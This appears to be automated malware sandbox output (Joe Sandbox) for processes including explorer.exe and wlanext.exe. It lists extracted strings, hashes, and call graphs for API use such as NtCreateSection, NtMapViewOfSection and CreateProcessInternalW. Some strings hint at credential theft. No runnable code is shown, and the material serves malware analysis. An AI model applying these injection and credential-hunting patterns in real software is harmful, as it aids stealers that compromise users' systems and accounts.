                                                                                • Source File: 0000000D.00000002.924612433.0000000008160000.00000040.00000001.00040000.00000000.sdmp, Offset: 08160000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8160000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: .dll$chro$hild$me_c
                                                                                • API String ID: 0-3136806129
                                                                                • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                • Instruction ID: 95cbb107130d6eced79014026b86918b02700b5c4152e457746562bb0ffe6992
                                                                                • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                • Instruction Fuzzy Hash: DB313974218F088FCB94EF688494BAAB7E1FF98201F94566DA44ACB355DF30C9458B92
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924612433.0000000008160000.00000040.00000001.00040000.00000000.sdmp, Offset: 08160000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8160000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                • API String ID: 0-319646191
                                                                                • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                • Instruction ID: 45353b62a74573f74b77717a7fc981075dd10d1ef83d52a6a4d535ca0452e886
                                                                                • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                • Instruction Fuzzy Hash: 4231A071614A0D8BCB44EFA8C8847EEBBE1FF58216F40422AE45ED7341DF7886458799
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924612433.0000000008160000.00000040.00000001.00040000.00000000.sdmp, Offset: 08160000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8160000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                • API String ID: 0-319646191
                                                                                • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                • Instruction ID: ce27ebd84a1430b34d0754868ed8c35f5be129a390c9728effe374ae13cfabac
                                                                                • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                • Instruction Fuzzy Hash: A721D270610A0D8BCF04EFA8C8847EDBBE0FF58206F40422AE45AD7341DF748605C799
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924612433.0000000008160000.00000040.00000001.00040000.00000000.sdmp, Offset: 08160000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8160000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: .$l$l$t
                                                                                • API String ID: 0-168566397
                                                                                • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                • Instruction ID: edcd8a3cc72f7f2f6a47061ef7043785fc1f780ba6b4cd39cc4784e7419afe41
                                                                                • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                • Instruction Fuzzy Hash: 3E215778A24E0D9BDB48EFA8C044BADBAE1FF58305F50462ED109D3701DB7495918B84
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924612433.0000000008160000.00000040.00000001.00040000.00000000.sdmp, Offset: 08160000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8160000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: .$l$l$t
                                                                                • API String ID: 0-168566397
                                                                                • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                • Instruction ID: 69d514958ef596039e6e5e5bd06a5819a65872b7f33590445ea8ab9f4a0c9507
                                                                                • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                • Instruction Fuzzy Hash: DA217A78A24E0E9BDB48EFA8C044BAEBAF1FF58305F50462ED109D3701DB7495918B84
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924612433.0000000008160000.00000040.00000001.00040000.00000000.sdmp, Offset: 08160000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8160000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: auth$logi$pass$user
                                                                                • API String ID: 0-2393853802
                                                                                • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                • Instruction ID: 3a992f9f8e5bf5cc384d0b7371c8619dd5271ac8ef3fed546ca04d9352a4898e
                                                                                • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                • Instruction Fuzzy Hash: 0F21CD30618B0D8BCB05DF9998906EEB7F1EF88354F004629E40AEB346D7B0E9158BD2

                                                                                Execution Graph

                                                                                Execution Coverage:2.4%
                                                                                Dynamic/Decrypted Code Coverage:6.5%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:617
                                                                                Total number of Limit Nodes:77
9ac10 LdrLoadDll 79534->79535 79536 9ad88 79535->79536 79537 9ac10 LdrLoadDll 79536->79537 79538 9ad91 79537->79538 79539 9ac10 LdrLoadDll 79538->79539 79540 9ad9d 79539->79540 79541 9ac10 LdrLoadDll 79540->79541 79542 9ada6 79541->79542 79543 9ac10 LdrLoadDll 79542->79543 79544 9adaf 79543->79544 79545 9ac10 LdrLoadDll 79544->79545 79546 9adb8 79545->79546 79547 9ac10 LdrLoadDll 79546->79547 79548 9adc1 79547->79548 79549 9ac10 LdrLoadDll 79548->79549 79550 9adca 79549->79550 79551 9ac10 LdrLoadDll 79550->79551 79552 9add6 79551->79552 79553 9ac10 LdrLoadDll 79552->79553 79554 9addf 79553->79554 79555 9ac10 LdrLoadDll 79554->79555 79556 9ade8 79555->79556 79557 9ac10 LdrLoadDll 79556->79557 79558 9adf1 79557->79558 79559 9ac10 LdrLoadDll 79558->79559 79560 9adfa 79559->79560 79561 9ac10 LdrLoadDll 79560->79561 79562 9ae03 79561->79562 79563 9ac10 LdrLoadDll 79562->79563 79564 9ae0f 79563->79564 79565 9ac10 LdrLoadDll 79564->79565 79566 9ae18 79565->79566 79567 9ac10 LdrLoadDll 79566->79567 79568 9ae21 79567->79568 79569 9ac10 LdrLoadDll 79568->79569 79570 9ae2a 79569->79570 79571 9ac10 LdrLoadDll 79570->79571 79572 9ae33 79571->79572 79573 9ac10 LdrLoadDll 79572->79573 79574 9ae3c 79573->79574 79575 9ac10 LdrLoadDll 79574->79575 79576 9ae48 79575->79576 79577 9ac10 LdrLoadDll 79576->79577 79578 9ae51 79577->79578 79579 9ac10 LdrLoadDll 79578->79579 79580 9ae5a 79579->79580 79581 9ac10 LdrLoadDll 79580->79581 79582 9ae63 79581->79582 79583 9ac10 LdrLoadDll 79582->79583 79584 9ae6c 79583->79584 79585 9ac10 LdrLoadDll 79584->79585 79586 9ae75 79585->79586 79587 9ac10 LdrLoadDll 79586->79587 79588 9ae81 79587->79588 79589 9ac10 LdrLoadDll 79588->79589 79590 9ae8a 79589->79590 79591 9ac10 LdrLoadDll 79590->79591 79592 9ae93 79591->79592 79593 9ac10 LdrLoadDll 79592->79593 79594 9ae9c 79593->79594 79595 9ac10 LdrLoadDll 79594->79595 79596 9aea5 79595->79596 79597 9ac10 LdrLoadDll 79596->79597 79598 9aeae 79597->79598 79599 9ac10 LdrLoadDll 79598->79599 79600 9aeba 
79599->79600 79601 9ac10 LdrLoadDll 79600->79601 79602 9aec3 79601->79602 79603 9ac10 LdrLoadDll 79602->79603 79604 9aecc 79603->79604 79604->79385 79606 9af40 LdrLoadDll 79605->79606 79607 99ebc 79606->79607 79632 203fdc0 LdrInitializeThunk 79607->79632 79608 99ed3 79608->79316 79610->79383 79612 9cf20 79611->79612 79613 9cf26 79611->79613 79612->79488 79614 9bf70 2 API calls 79613->79614 79615 9cf4c 79614->79615 79615->79488 79617 9cfb0 79616->79617 79618 9bf70 2 API calls 79617->79618 79620 9d00d 79617->79620 79619 9cfea 79618->79619 79621 9bda0 2 API calls 79619->79621 79620->79494 79621->79620 79623 94334 79622->79623 79624 9bda0 2 API calls 79622->79624 79623->79507 79624->79623 79625->79493 79627 9ac2b 79626->79627 79628 94e50 LdrLoadDll 79627->79628 79629 9ac4b 79628->79629 79630 94e50 LdrLoadDll 79629->79630 79631 9acf7 79629->79631 79630->79631 79631->79529 79632->79608 79633->79391 79635 9a66c RtlFreeHeap 79634->79635 79636 9af40 LdrLoadDll 79634->79636 79635->79395 79636->79635 79638 87eab 79637->79638 79639 87eb0 79637->79639 79638->79324 79640 9bd20 2 API calls 79639->79640 79643 87ed5 79640->79643 79641 87f38 79641->79324 79642 99ea0 2 API calls 79642->79643 79643->79641 79643->79642 79644 87f3e 79643->79644 79648 9bd20 2 API calls 79643->79648 79653 9a5a0 79643->79653 79646 87f64 79644->79646 79647 9a5a0 2 API calls 79644->79647 79646->79324 79649 87f55 79647->79649 79648->79643 79649->79324 79651 8817e 79650->79651 79652 9a5a0 2 API calls 79650->79652 79651->79281 79652->79651 79654 9a5bc 79653->79654 79655 9af40 LdrLoadDll 79653->79655 79658 203fb68 LdrInitializeThunk 79654->79658 79655->79654 79656 9a5d3 79656->79643 79658->79656 79660 9b5a3 79659->79660 79661 8acf0 LdrLoadDll 79660->79661 79662 89c5b 79661->79662 79662->79289 79665 8b063 79663->79665 79664 8b0e0 79664->79294 79665->79664 79678 99c70 LdrLoadDll 79665->79678 79668 9af40 LdrLoadDll 79667->79668 79669 8f1bb 79668->79669 79669->79297 79670 9a7b0 79669->79670 79671 9a7cf 
LookupPrivilegeValueW 79670->79671 79672 9af40 LdrLoadDll 79670->79672 79671->79299 79672->79671 79674 9af40 LdrLoadDll 79673->79674 79675 9a25c 79674->79675 79679 203fed0 LdrInitializeThunk 79675->79679 79676 9a27b 79676->79300 79678->79664 79679->79676 79681 8b1f0 79680->79681 79682 8b040 LdrLoadDll 79681->79682 79683 8b204 79682->79683 79683->79236 79685 8af34 79684->79685 79757 99c70 LdrLoadDll 79685->79757 79687 8af6e 79687->79238 79689 8f3ac 79688->79689 79690 8b1c0 LdrLoadDll 79689->79690 79691 8f3be 79690->79691 79758 8f290 79691->79758 79694 8f3d9 79697 8f3e4 79694->79697 79698 9a470 2 API calls 79694->79698 79695 8f3f1 79696 8f402 79695->79696 79699 9a470 2 API calls 79695->79699 79696->79241 79697->79241 79698->79697 79699->79696 79701 8f43c 79700->79701 79777 8b2b0 79701->79777 79703 8f44e 79704 8f290 3 API calls 79703->79704 79705 8f45f 79704->79705 79706 8f469 79705->79706 79707 8f481 79705->79707 79709 8f474 79706->79709 79710 9a470 2 API calls 79706->79710 79708 8f492 79707->79708 79711 9a470 2 API calls 79707->79711 79708->79243 79709->79243 79710->79709 79711->79708 79713 8caa6 79712->79713 79714 8cab0 79712->79714 79713->79252 79715 8af10 LdrLoadDll 79714->79715 79716 8cb4e 79715->79716 79717 8cb74 79716->79717 79718 8b040 LdrLoadDll 79716->79718 79717->79252 79719 8cb90 79718->79719 79720 94a50 8 API calls 79719->79720 79721 8cbe5 79720->79721 79721->79252 79723 8d646 79722->79723 79724 8b040 LdrLoadDll 79723->79724 79725 8d65a 79724->79725 79781 8d310 79725->79781 79727 8908b 79728 8cc00 79727->79728 79729 8cc26 79728->79729 79730 8b040 LdrLoadDll 79729->79730 79731 8cca9 79729->79731 79730->79731 79732 8b040 LdrLoadDll 79731->79732 79733 8cd16 79732->79733 79734 8af10 LdrLoadDll 79733->79734 79735 8cd7f 79734->79735 79736 8b040 LdrLoadDll 79735->79736 79737 8ce2f 79736->79737 79737->79265 79741 88d14 79738->79741 79810 8f6d0 79738->79810 79740 88f25 79740->79221 79741->79740 79815 943a0 79741->79815 79743 88d70 79743->79740 79818 88ab0 
79743->79818 79746 9cf10 2 API calls 79747 88db2 79746->79747 79748 9d040 3 API calls 79747->79748 79752 88dc7 79748->79752 79749 87ea0 4 API calls 79749->79752 79752->79740 79752->79749 79753 88160 2 API calls 79752->79753 79754 8c7b0 18 API calls 79752->79754 79823 8f670 79752->79823 79827 8f080 21 API calls 79752->79827 79753->79752 79754->79752 79755->79244 79756->79262 79757->79687 79759 8f2aa 79758->79759 79767 8f360 79758->79767 79760 8b040 LdrLoadDll 79759->79760 79761 8f2cc 79760->79761 79768 99f20 79761->79768 79763 8f30e 79771 99f60 79763->79771 79766 9a470 2 API calls 79766->79767 79767->79694 79767->79695 79769 9af40 LdrLoadDll 79768->79769 79770 99f3c 79768->79770 79769->79770 79770->79763 79772 99f7c 79771->79772 79773 9af40 LdrLoadDll 79771->79773 79776 20407ac LdrInitializeThunk 79772->79776 79773->79772 79774 8f354 79774->79766 79776->79774 79778 8b2d7 79777->79778 79779 8b040 LdrLoadDll 79778->79779 79780 8b313 79779->79780 79780->79703 79782 8d327 79781->79782 79790 8f710 79782->79790 79786 8d39b 79787 8d3a2 79786->79787 79801 9a280 LdrLoadDll 79786->79801 79787->79727 79789 8d3b5 79789->79727 79791 8f735 79790->79791 79802 881a0 79791->79802 79793 8d36f 79798 9a6c0 79793->79798 79794 94a50 8 API calls 79796 8f759 79794->79796 79796->79793 79796->79794 79797 9bda0 2 API calls 79796->79797 79809 8f550 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 79796->79809 79797->79796 79799 9af40 LdrLoadDll 79798->79799 79800 9a6df CreateProcessInternalW 79799->79800 79800->79786 79801->79789 79803 8829f 79802->79803 79804 881b5 79802->79804 79803->79796 79804->79803 79805 94a50 8 API calls 79804->79805 79806 88222 79805->79806 79807 9bda0 2 API calls 79806->79807 79808 88249 79806->79808 79807->79808 79808->79796 79809->79796 79811 94e50 LdrLoadDll 79810->79811 79812 8f6ef 79811->79812 79813 8f6fd 79812->79813 79814 8f6f6 SetErrorMode 79812->79814 79813->79741 79814->79813 79817 943c6 79815->79817 79828 8f4a0 79815->79828 79817->79743 79819 9bd20 2 
API calls 79818->79819 79822 88ad5 79819->79822 79820 88cea 79820->79746 79822->79820 79847 99860 79822->79847 79824 8f683 79823->79824 79895 99e70 79824->79895 79827->79752 79829 8f4bd 79828->79829 79835 99fa0 79829->79835 79832 8f505 79832->79817 79836 9af40 LdrLoadDll 79835->79836 79837 99fbc 79836->79837 79845 203ffb4 LdrInitializeThunk 79837->79845 79838 8f4fe 79838->79832 79840 99ff0 79838->79840 79841 9a00c 79840->79841 79842 9af40 LdrLoadDll 79840->79842 79846 203fc60 LdrInitializeThunk 79841->79846 79842->79841 79843 8f52e 79843->79817 79845->79838 79846->79843 79848 9bf70 2 API calls 79847->79848 79849 99877 79848->79849 79868 89310 79849->79868 79851 99892 79852 998b9 79851->79852 79853 998d0 79851->79853 79854 9bda0 2 API calls 79852->79854 79856 9bd20 2 API calls 79853->79856 79855 998c6 79854->79855 79855->79820 79857 9990a 79856->79857 79858 9bd20 2 API calls 79857->79858 79859 99923 79858->79859 79865 99bc4 79859->79865 79874 9bd60 LdrLoadDll 79859->79874 79861 99ba9 79862 99bb0 79861->79862 79861->79865 79863 9bda0 2 API calls 79862->79863 79864 99bba 79863->79864 79864->79820 79866 9bda0 2 API calls 79865->79866 79867 99c19 79866->79867 79867->79820 79869 89335 79868->79869 79870 8acf0 LdrLoadDll 79869->79870 79871 89368 79870->79871 79873 8938d 79871->79873 79875 8cf20 79871->79875 79873->79851 79874->79861 79876 8cf4c 79875->79876 79877 9a1c0 LdrLoadDll 79876->79877 79878 8cf65 79877->79878 79879 8cf6c 79878->79879 79886 9a200 79878->79886 79879->79873 79883 8cfa7 79884 9a470 2 API calls 79883->79884 79885 8cfca 79884->79885 79885->79873 79887 9a21c 79886->79887 79888 9af40 LdrLoadDll 79886->79888 79894 203fbb8 LdrInitializeThunk 79887->79894 79888->79887 79889 8cf8f 79889->79879 79891 9a7f0 79889->79891 79892 9a80f 79891->79892 79893 9af40 LdrLoadDll 79891->79893 79892->79883 79893->79892 79894->79889 79896 9af40 LdrLoadDll 79895->79896 79897 99e8c 79896->79897 79900 203fd8c LdrInitializeThunk 79897->79900 79898 8f6ae 79898->79752 79900->79898

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • NtQueryInformationProcess.NTDLL ref: 00A4A19F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923599822.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_a40000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: InformationProcessQuery
                                                                                • String ID: 0
                                                                                • API String ID: 1778838933-4108050209
                                                                                • Opcode ID: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
                                                                                • Instruction ID: 0add6d2a31a3e9f28afd8c5eccbfe051a0001dbc4d4a6641453b091cd341f7d7
                                                                                • Opcode Fuzzy Hash: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
                                                                                • Instruction Fuzzy Hash: 94F13274928A4C8FDBA9EF68C895AEEB7E0FF98304F40462AE44ED7251DF349541CB41

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 207 a49baf-a49bfe call a49102 210 a49c00 207->210 211 a49c0c-a49c9a call a4b942 * 2 NtCreateSection 207->211 213 a49c02-a49c0a 210->213 217 a49ca0-a49d0a call a4b942 NtMapViewOfSection 211->217 218 a49d5a-a49d68 211->218 213->211 213->213 221 a49d52 217->221 222 a49d0c-a49d4c 217->222 221->218 224 a49d4e-a49d4f 222->224 225 a49d69-a49d6b 222->225 224->221 226 a49d6d-a49d72 225->226 227 a49d88-a49ddc call a4cd62 NtClose 225->227 228 a49d74-a49d86 call a49172 226->228 228->227
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923599822.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_a40000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: Section$CloseCreateView
                                                                                • String ID: @$@
                                                                                • API String ID: 1133238012-149943524
                                                                                • Opcode ID: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
                                                                                • Instruction ID: 6c57070488d7e04a1f01835b988dac3b4ef648f4b6b7ba6fd328fdd8f22d3ef4
                                                                                • Opcode Fuzzy Hash: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
                                                                                • Instruction Fuzzy Hash: E5619F7461CB088FCB58EF68D8856AABBE0FF98314F50062EE58AC3651DF35D441CB86

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 266 a49bb2-a49bef 267 a49bf7-a49bfe 266->267 268 a49bf2 call a49102 266->268 269 a49c00 267->269 270 a49c0c-a49c9a call a4b942 * 2 NtCreateSection 267->270 268->267 272 a49c02-a49c0a 269->272 276 a49ca0-a49d0a call a4b942 NtMapViewOfSection 270->276 277 a49d5a-a49d68 270->277 272->270 272->272 280 a49d52 276->280 281 a49d0c-a49d4c 276->281 280->277 283 a49d4e-a49d4f 281->283 284 a49d69-a49d6b 281->284 283->280 285 a49d6d-a49d72 284->285 286 a49d88-a49ddc call a4cd62 NtClose 284->286 287 a49d74-a49d86 call a49172 285->287 287->286
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923599822.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_a40000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: Section$CreateView
                                                                                • String ID: @$@
                                                                                • API String ID: 1585966358-149943524
                                                                                • Opcode ID: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
                                                                                • Instruction ID: f1d54b4e5b3b181150701f0a6127f327aa38ec6dd4df760203d6aa99267f9208
                                                                                • Opcode Fuzzy Hash: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
                                                                                • Instruction Fuzzy Hash: FC517E70618B088FDB58DF58D8956ABBBE0FB98314F50062EF98AC3651DF35D441CB86

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 294 9a392-9a396 295 9a398-9a439 call 9af40 NtReadFile 294->295 296 9a350-9a354 294->296 297 9a35c-9a391 NtCreateFile 296->297 298 9a357 call 9af40 296->298 298->297
                                                                                APIs
                                                                                • NtCreateFile.NTDLL(00000060,00000000,.z`,00094BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00094BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0009A38D
                                                                                • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1J,FFFFFFFF,?,rM,?,00000000), ref: 0009A435
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_80000_wlanext.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CreateRead
                                                                                • String ID: .z`$1J
                                                                                • API String ID: 3388366904-1222012080
                                                                                • Opcode ID: 8c54b2ab54814b5a95f95e51e3a3db47f28d6cb4cc196ba46914838d11b87391
                                                                                • Instruction ID: 94f3940aa2123c716a672b603d29bcdd4bd8d909f1d26d4b5b6a4698b39043ef
                                                                                • Opcode Fuzzy Hash: 8c54b2ab54814b5a95f95e51e3a3db47f28d6cb4cc196ba46914838d11b87391
                                                                                • Instruction Fuzzy Hash: 3F21F3B2204148AFCB08DF98DC91DEB77EAAF8D358B158248FA1DD7251D630EC11CBA0

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • NtQueryInformationProcess.NTDLL ref: 00A4A19F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923599822.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_a40000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: InformationProcessQuery
                                                                                • String ID: 0
                                                                                • API String ID: 1778838933-4108050209
                                                                                • Opcode ID: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
                                                                                • Instruction ID: 9e5cbf6c4c2cfc3bede1420d303a7f85ae094ef108348c03aefd773aa3861689
                                                                                • Opcode Fuzzy Hash: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
                                                                                • Instruction Fuzzy Hash: 87512B74918A8C8FDBA9EF68C8946EEBBF4FB98304F40462ED44AD7251DF309645CB41

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 560 9a340-9a391 call 9af40 NtCreateFile
                                                                                APIs
                                                                                • NtCreateFile.NTDLL(00000060,00000000,.z`,00094BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00094BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0009A38D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_80000_wlanext.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID: .z`
                                                                                • API String ID: 823142352-1441809116
                                                                                • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                • Instruction ID: 0c4abf70ec6ad5aeec8ea2fcbd2d95a1ec985d7ae469d323ea612ea60344f05c
                                                                                • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                • Instruction Fuzzy Hash: C0F0BDB2200208ABCB08CF88DC95EEB77EDAF8C754F158248BA0D97241C630E8118BA4

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 563 9a3ea-9a406 564 9a40c-9a439 NtReadFile 563->564 565 9a407 call 9af40 563->565 565->564
                                                                                APIs
                                                                                • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1J,FFFFFFFF,?,rM,?,00000000), ref: 0009A435
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_80000_wlanext.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileRead
                                                                                • String ID: 1J
                                                                                • API String ID: 2738559852-2845985182
                                                                                • Opcode ID: dcb9f5aa1df7a8cd51243e1eb72ffb8043a879b8cf83bb9b31d648a67041aa0d
                                                                                • Instruction ID: 6554e365bb75fbce8bcf0951321bb67bf838421ccc035af913d32266fb01b298
                                                                                • Opcode Fuzzy Hash: dcb9f5aa1df7a8cd51243e1eb72ffb8043a879b8cf83bb9b31d648a67041aa0d
                                                                                • Instruction Fuzzy Hash: 8FF0E2B6200208ABCB18DF88DC80EEB77A9AF8C354F158248BA1D97241C630E851CBA0

Control-flow Graph
• Nodes: 566: 9a3f0-9a406; 567: 9a40c-9a439 NtReadFile; 568: 9a407 call 9af40
• Edges: 566->567, 566->568, 568->567
APIs
• NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1J,FFFFFFFF,?,rM,?,00000000), ref: 0009A435
Strings
Memory Dump Source
• Source File: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_80000_wlanext.jbxd
Yara matches
Similarity
• API ID: FileRead
• String ID: 1J
• API String ID: 2738559852-2845985182
• Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
• Instruction ID: e6ef27d6ca281ebc2a40a49134fdca855c6b43a6ce6ff2ca2eff67590ba9a2e2
• Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
• Instruction Fuzzy Hash: 4EF0A4B2200208ABCB14DF89DC95EEB77ADAF8C754F158258BA1D97251D630E8118BA0

Control-flow Graph
• Nodes: 569: 9a43a-9a43b; 570: 9a43d-9a469 call 9af40; 571: 9a423-9a439 NtReadFile
• Edges: 569->570, 569->571
APIs
• NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1J,FFFFFFFF,?,rM,?,00000000), ref: 0009A435
Strings
Memory Dump Source
• Source File: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_80000_wlanext.jbxd
Yara matches
Similarity
• API ID: FileRead
• String ID: }K
• API String ID: 2738559852-3375959163
• Opcode ID: 7b42998f686dc38c68e2e06c340acd3835ab50e2df2089e8ce641c4ef18469f6
• Instruction ID: bece616e186723e4cbaacbad8a82f97b529cea2136870b0588d4a9e981b896b9
• Opcode Fuzzy Hash: 7b42998f686dc38c68e2e06c340acd3835ab50e2df2089e8ce641c4ef18469f6
• Instruction Fuzzy Hash: AFF05E762042046BDB14EF94EC85EEB77ACEF88320F008559FE5C8B241C575E90087E0
APIs
• NtClose.NTDLL(PM,?,?,00094D50,00000000,FFFFFFFF), ref: 0009A495
Strings
Memory Dump Source
• Source File: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_80000_wlanext.jbxd
Yara matches
Similarity
• API ID: Close
• String ID: PM
• API String ID: 3535843008-2952166990
• Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
• Instruction ID: ada41b9c046a68f67638934593d96bca242b3ef569f3d93702ca4c74fe05ed8f
• Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
• Instruction Fuzzy Hash: 3DD01776200214ABDB10EBD8CC89EE77BACEF48760F1544A9BA189B242C530FA0086E0
APIs
• NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00082D11,00002000,00003000,00000004), ref: 0009A559
Memory Dump Source
• Source File: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_80000_wlanext.jbxd
Yara matches
Similarity
• API ID: AllocateMemoryVirtual
